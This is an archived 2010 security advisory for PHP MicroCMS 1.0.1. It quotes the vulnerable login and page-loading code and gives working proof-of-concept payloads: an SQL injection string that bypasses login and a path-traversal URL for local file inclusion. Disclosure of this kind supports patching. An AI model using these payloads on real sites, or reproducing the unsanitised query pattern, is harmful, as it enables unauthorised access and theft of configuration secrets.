PHP MicroCMS 1.0.1 Multiple Remote Vulnerabilities
Posted on 15 September 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>PHP MicroCMS 1.0.1 Multiple Remote Vulnerabilities</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>================================================== PHP MicroCMS 1.0.1 Multiple Remote Vulnerabilities ================================================== Title : PHP MicroCMS 1.0.1 Multiple Remote Vulnerabilities Affected Version : PHP MicroCMS <= 1.0.1 Vendor Site : www.apphp.com/php-microcms/index.php Discovery : abysssec.com Description : This CMS have many critical vulnerability that we refere to some of those here: Vulnerabilites : 1. Authentication bypass with SQL Injection in login page: user_name and password parameters recived from the login form are passed to do_login function: login.php line 12-17: function Login() { $this->wrong_login = false; if (!$this->is_logged_in() && $_POST['submit'] == "Login" && !empty($_POST['user_name']) && !empty($_POST['password'])) $this->do_login($_POST['user_name'], $_POST['password']); else if ($_POST['submit_logout'] == "Logout") $this->do_logout(); $this->accounts = new Profiles($GLOBALS['user_session']->get_session_variable("session_account_id")); } in do_login function these parameters are passed to get_account_information function: login.php line 19-29: function do_login($user_name, $password, $do_redirect = true) { if ($account_information = $this->get_account_information($user_name, $password)) { $this->set_session_variables($account_information); if ($do_redirect) { header("Location: index.php "); exit; } }else{ $this->wrong_login = true; } } then these parameters without any validation are applied in SQL query directly: login.php line 48-55: function get_account_information($user_name, $password) { $sql = "SELECT ".DB_PREFIX."accounts.*, user_name AS account_name FROM ".DB_PREFIX."accounts WHERE user_name = '" . $user_name . "' AND // vulnerability here password = AES_ENCRYPT('" . $password . "', '" . DB_ENCRYPT_KEY . "')"; // vulnerability here return database_query($sql, DATA_ONLY, FIRST_ROW_ONLY); } POC: in login page enter: username: a' or '1'='1 password: a' or '1'='1 ---------------------------------------------------------------------------------------------------- 2. Local File Inclusion: index.php file line 21: $page = !empty($_GET['page']) ? $_GET['page'] : "home"; index.php file line 104,105: if (($page != "") && file_exists("page/" . $page . ".php")) { require("page/" . $page . ".php"); poc: http://localhost/microcms/index.php?page=../include/base.inc.php%00 # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-15]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
